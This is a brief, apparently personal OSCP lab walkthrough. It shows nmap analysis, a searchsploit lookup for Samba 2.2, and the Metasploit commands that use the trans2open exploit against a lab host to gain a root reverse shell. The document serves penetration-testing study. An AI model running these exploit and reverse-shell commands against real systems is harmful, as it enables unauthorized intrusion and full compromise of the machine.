OSCP Security Technology - Gaining Root with Metasploit

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

OSCP Security Technology - Gaining Root with Metasploit

searchsploit samba 2.2 

OSCP Security Technology - Gaining Root with Metasploit

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

OSCP Security Technology - Gaining Root with Metasploit

set rhost 192.168.2.28
show targets
exploit

OSCP Security Technology - Gaining Root with Metasploit

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

OSCP Security Technology - Gaining Root with Metasploit

OSCP Security Technology - Gaining Root with Metasploit

上一篇:ansible playbook使用


下一篇:Ansible之playbook剧本(原来的地方没有蝴蝶在飞,小野狗也不会飞。)